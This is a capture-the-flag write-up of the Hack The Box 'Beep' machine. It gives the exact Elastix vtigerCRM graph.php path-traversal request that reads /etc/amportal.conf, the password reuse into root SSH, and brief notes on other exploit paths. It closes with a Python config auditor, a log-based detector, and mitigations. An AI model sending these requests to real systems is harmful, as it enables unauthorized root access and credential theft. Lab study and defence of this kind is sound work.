Summary
The LFI + credential-reuse path lands root in ~5 minutes. Two 2026-specific client gotchas required adjustments beyond the original recipes (see “2026 client adjustments” below).
Beep is a famously broad HTB Linux Easy: more than a dozen open ports, an
EOL CentOS 5 / Elastix 2.2.0 PBX install, and at least five independent
paths to root. The shortest is a one-shot CVE-2012-4869 LFI in
Elastix’s bundled vtigerCRM module (/vtigercrm/graph.php) that reads
/etc/amportal.conf — and that file contains the FreePBX admin password
in clear. Because Elastix uses the same password for every administrative
surface (FreePBX admin, Webmin, system root SSH), the recovered credential
unlocks ssh root@<TARGET> directly. The user flag and root flag are both
on the same shell, no escalation needed.
The teaching beats are layered: (a) password reuse across surfaces is catastrophic — one config file leaks credentials that work for four services; (b) legacy SSH ciphers are a recurring 2026 gotcha — the modern OpenSSH client refuses CentOS 5’s old key exchange and HMAC by default and will hang on the banner unless told to fall back; (c) broad attack-surface boxes are an exercise in triage — newcomers spend hours fuzzing every port; experienced operators find the LFI in 5 minutes by knowing the version-to-CVE mapping for Elastix 2.2.
This writeup walks the LFI-and-credential-reuse path because it is
shortest and highest-yield. Five additional paths (FreePBX RCE,
Shellshock via Webmin/cgi-bin, asterisk-user nmap interactive escape,
SMTP-to-LFI webshell injection, default Elastix admin/admin) are
mentioned in passing.
Recon
nmap -sC -sV -p- --min-rate=2000 -oN nmap/full.txt <TARGET>
22/tcp open ssh OpenSSH 4.3 (CentOS)
25/tcp open smtp Postfix
80/tcp open http Apache 2.2.3 (CentOS)
110/tcp open pop3 Cyrus pop3d
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd
443/tcp open https Apache 2.2.3 (CentOS)
993/tcp open imaps Cyrus imapd
995/tcp open pop3s Cyrus pop3d
3306/tcp open mysql MySQL (access denied)
4445/tcp open upnotifyp
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin)
The OpenSSH 4.3 + Apache 2.2.3 + CentOS 5 banner family pins this as a CentOS 5 / RHEL 5 era host (2007-2010). The HylaFAX + Asterisk Call Manager + Cyrus mail combo is the giveaway for Elastix — a PBX distribution that bundles Asterisk, FreePBX, HylaFAX, Cyrus, postfix, and a handful of web admin panels into a single appliance.
Browsing https://<TARGET>/ redirects to the Elastix web admin
landing page. The page footer reveals Elastix 2.2.0 —
released 2011, with a documented LFI (CVE-2012-4869) and several
RCEs in the bundled vtigerCRM and FreePBX modules.
The version banner alone is enough to pick a path: Elastix 2.2.0 with the bundled vtigerCRM module means the graph.php LFI. Recover the admin password from /etc/amportal.conf and credential-reuse into SSH.
2026 client adjustments
Two recipes from older walkthroughs need updating to work with modern Kali/Debian tooling:
curl against the Elastix HTTPS endpoint — modern OpenSSL rejects
TLS 1.0, SHA-1 certs, and small DH groups by default. Need both the
TLS pin and @SECLEVEL=0:
curl -sk --tlsv1.0 --tls-max 1.0 --ciphers 'DEFAULT:@SECLEVEL=0' "https://<TARGET>/..."
Symptom without these: error:0A000102:SSL routines::unsupported protocol.
ssh against OpenSSH 4.3 — in addition to the legacy KEX and
HostKey algorithms, OpenSSH 9.x also disables ssh-rsa in
PubkeyAcceptedAlgorithms by default:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
-oHostKeyAlgorithms=+ssh-rsa \
-oPubkeyAcceptedAlgorithms=+ssh-rsa \
-c 3des-cbc \
root@<TARGET>
Foothold — CVE-2012-4869 (Elastix vtigerCRM LFI)
The vtigerCRM module shipped with Elastix 2.2 includes a
graph.php endpoint that uses the current_language parameter
to include a PHP file from a relative path:
GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1
The %00 truncates the engine’s auto-appended .php, and the
traversal sequence reaches /etc/amportal.conf. The response
inlines the file’s contents into the rendered HTML. The
load-bearing line:
AMPDBPASS=somepassword
(Plus AMPMGRPASS, AMPMGRUSER — all the same password.)
amportal.conf is FreePBX’s master configuration file and
holds the admin password in plaintext. On Elastix 2.2 the same
password is used for the system root account, the FreePBX
admin panel, the Webmin instance on tcp/10000, the asterisk
manager on tcp/5038, and the MySQL root account. One leak →
five services unlocked.
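The two defensive points in this section (plaintext secrets in amportal.conf and one value shared across services) are easy to check for on an appliance before an attacker does it for you. The following is an added example, not code from the original writeup or from the Elastix/FreePBX projects: a small Python audit that parses an amportal.conf-style file, lists every plaintext secret key, flags any value that more than one key shares, and checks that the file is root-owned and mode 0600. The sample file content and its PLACEHOLDER_PASSWORD value are constructed here; the assumption that secret keys end in PASS, PASSWORD or SECRET is mine.

```python
import os
import stat
from collections import defaultdict

# Constructed sample in the shape of /etc/amportal.conf (placeholder values,
# not the real file from the box).
SAMPLE_AMPORTAL = """\
# FreePBX master configuration (constructed sample)
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
AMPDBPASS=PLACEHOLDER_PASSWORD
AMPMGRUSER=admin
AMPMGRPASS=PLACEHOLDER_PASSWORD
AMPWEBADDRESS=
"""

# Assumption: keys holding secrets end with one of these suffixes.
PASSWORD_KEY_SUFFIXES = ("PASS", "PASSWORD", "SECRET")


def parse_amportal(text):
    """Parse KEY=VALUE lines; skip comments and blanks. Values may be empty."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def secret_keys(conf):
    """Keys that carry a non-empty plaintext secret."""
    return sorted(k for k, v in conf.items()
                  if v and k.upper().endswith(PASSWORD_KEY_SUFFIXES))


def find_password_reuse(conf):
    """Return {value: [keys...]} for every secret value used by more than one key."""
    by_value = defaultdict(list)
    for key in secret_keys(conf):
        by_value[conf[key]].append(key)
    return {v: sorted(keys) for v, keys in by_value.items() if len(keys) > 1}


def check_permissions(path):
    """Flag a config file readable by group/other or not owned by root."""
    st = os.stat(path)
    findings = []
    if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("readable by group/other (want mode 0600)")
    if st.st_uid != 0:
        findings.append("not owned by root")
    return findings


def audit(path):
    """Full audit of one amportal.conf-style file."""
    with open(path) as fh:
        conf = parse_amportal(fh.read())
    return {
        "plaintext_secret_keys": secret_keys(conf),
        "reused": find_password_reuse(conf),
        "permission_findings": check_permissions(path),
    }


if __name__ == "__main__":
    import tempfile
    # Write the constructed sample with the loose mode the appliance image ships,
    # so the permission check has something to report.
    with tempfile.NamedTemporaryFile("w", suffix=".conf", delete=False) as tmp:
        tmp.write(SAMPLE_AMPORTAL)
    os.chmod(tmp.name, 0o644)
    for name, result in audit(tmp.name).items():
        print(f"{name}: {result}")
    os.unlink(tmp.name)
```

Any entry in `reused` is the condition this box turns on: a single leaked value that opens more than one service. Run it against the real file as root on the appliance; the permission findings are the mitigation listed later in the writeup (root-owned, mode 0600).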
Foothold — SSH as root
ssh root@<TARGET>
Modern OpenSSH (≥9.x) rejects the legacy ciphers Elastix 2.2’s sshd advertises. The connection hangs at kex_exchange_identification. Force the legacy modes:
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
-oHostKeyAlgorithms=+ssh-rsa \
-oPubkeyAcceptedAlgorithms=+ssh-rsa \
-c 3des-cbc \
root@<TARGET>
Password: the value recovered from amportal.conf. (See “2026 client
adjustments” above for why PubkeyAcceptedAlgorithms is now needed.)
[root@beep ~]# id
uid=0(root) gid=0(root) ...
[root@beep ~]# cat /home/fanis/user.txt
[root@beep ~]# cat /root/root.txt
There is no separate user-to-root step on Beep — root is the
foothold. The user flag is owned by fanis, but root reads it
trivially.
Alternative paths (summarised)
For completeness — all of these land root or root-equivalent:
- FreePBX RCE (CVE-2014-7235): the FreePBX admin recordings/misc/callme_page.php POST is vulnerable to PHP extract()-driven variable overwriting that yields a webshell. ExploitDB 36941. Requires no creds.
- Shellshock via Webmin / cgi-bin (CVE-2014-6271): the Webmin instance at tcp/10000 is built on bash scripts and is vulnerable to the standard Shellshock User-Agent injection.
- Default Elastix admin/admin: the Elastix admin panel sometimes ships with default credentials. Worth a quick try on any Elastix install.
- asterisk user + sudo nmap: post-foothold as asterisk, nmap --interactive (the legacy mode) drops to a shell; when invoked via sudo, the spawned shell inherits privileges. ExploitDB 11005.
- SMTP-to-LFI webshell: send a PHP-bodied email; the Cyrus IMAP message store is in a path the LFI can reach; include the message file via the same graph.php vector for arbitrary RCE.
The LFI + credential-reuse is the shortest. The FreePBX RCE and Shellshock paths are pedagogically valuable (one’s a PHP type-juggling bug, the other’s the reference Shellshock vector), but neither is shorter than reading one config file.
Why each step worked
- vtigerCRM graph.php include($_GET['current_language'] . '.php'): the file inclusion is built from a user-controlled string concatenated with a fixed extension. Path traversal + null-byte truncation reaches anything on disk. The fix (Elastix 2.3+) was to validate the parameter against an allow-list of language codes.
- Plaintext password storage in amportal.conf: FreePBX’s AMP requires runtime access to the password, and the designers chose plaintext config over an at-rest encrypted alternative. The mitigation is to make amportal.conf mode 0600 and root-owned (it isn’t on the appliance image).
- Credential reuse across services: the Elastix appliance installer prompts for a single admin password and uses it for FreePBX, Webmin, asterisk manager, MySQL root, and system root. The convenience-vs-security tradeoff is set far to the convenience end.
- Legacy SSH ciphers: OpenSSH 4.3 (2006) advertises ssh-rsa, diffie-hellman-group1-sha1, and 3des-cbc, which modern clients (≥9.x) reject by default.
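The first bullet above describes the include pattern behind CVE-2012-4869 and the allow-list fix. From the defender's side, the same facts give a detection: the only legitimate current_language values are language codes, so anything else in that parameter is worth an alert. The following is an added example (mine, not from the writeup, and not how Elastix or vtigerCRM implement anything): a Python pass over Apache combined-format access log lines that parses each request to graph.php, decodes current_language, and flags traversal, null-byte truncation and sensitive target files. The log lines, IPs and timestamps are constructed; the xx_yy language-code regex is an assumption about what graph.php legitimately accepts.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (not from the box's logs). The second
# line carries the request shape shown earlier in the writeup.
SAMPLE_LOG = """\
10.10.14.5 - - [05/Jan/2026:10:01:02 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Jan/2026:10:01:09 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 4231 "-" "curl/8.5.0"
10.10.14.7 - - [05/Jan/2026:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.14.9 - - [05/Jan/2026:10:03:14 +0000] "GET /vtigercrm/graph.php?current_language=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 2048 "-" "python-requests/2.31"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption: graph.php legitimately accepts only language codes such as en_us.
LANGUAGE_CODE_RE = re.compile(r"^[a-z]{2}_[a-z]{2}$")

# Files whose basename in the parameter is an immediate escalation concern.
SENSITIVE_BASENAMES = ("amportal.conf", "passwd", "shadow")


def classify_request(target):
    """Return indicator strings for a graph.php request, or [] if it looks benign."""
    url = urlsplit(target)
    if not url.path.endswith("/vtigercrm/graph.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    if "current_language" not in params:
        return []
    # parse_qs already decoded once; decode again to catch double-encoded payloads.
    value = unquote(params["current_language"][0])

    indicators = []
    if "\x00" in value:
        indicators.append("null_byte")          # truncates the appended ".php"
    if "../" in value or "..\\" in value:
        indicators.append("path_traversal")
    if value.startswith("/"):
        indicators.append("absolute_path")
    if not LANGUAGE_CODE_RE.match(value):
        indicators.append("not_language_code")  # the allow-list check, inverted
    basename = value.rstrip("\x00").replace("\\", "/").rsplit("/", 1)[-1]
    if basename in SENSITIVE_BASENAMES:
        indicators.append(f"sensitive_file:{basename}")
    return indicators


def scan_log(text):
    """Parse combined-format lines and return one record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group("target"))
        if indicators:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),   # 200 means the include ran
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A flagged request with status 200 is the case to treat as a confirmed file read, since graph.php returns 200 whether or not the included path was a language file; pair it with the amportal.conf audit and assume the admin password is burned.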
Counterfactuals
- Patch Elastix to 2.3+ (or migrate off; Elastix-2 is EOL). CVE-2012-4869 was fixed in 2.3.
- Do not store plaintext passwords in world-readable config files. Move the FreePBX AMP password to a root-owned 0600 file or to a credential vault.
- Do not reuse passwords across services. Even if amportal.conf is compromised, the SSH path should require a separate credential.
- Disable Webmin on production PBX appliances; it is a large attack surface for marginal value.
- Disable legacy SSH key-exchange and ciphers on the server (SSHD config). On the client side, force-enabling them only to talk to legacy hosts is the correct response — but do not globally enable them in ~/.ssh/config.
Key Takeaways
- An LFI on a known-vulnerable web app + a config file that contains the admin password = full compromise in two HTTP requests. Always grep the bundled-app version against the CVE database before wordlist-fuzzing the surface.
- Password reuse turns one bug into many: the attacker’s reward for finding any single credential leak is access to every service that shares the password. Treat any leaked cleartext credential as compromising every account that could plausibly be using the same secret.
- Modern SSH client failures against legacy hosts are configuration, not vulnerability — keep the -oKexAlgorithms=+... recipe handy for old appliances.
References
- 0xdf, “HTB: Beep”
- IppSec, “Beep”
- ExploitDB 18650 (CVE-2012-4869, Elastix LFI)
- ExploitDB 36941 (CVE-2014-7235, FreePBX recordings RCE)
- Elastix project security advisory (2012)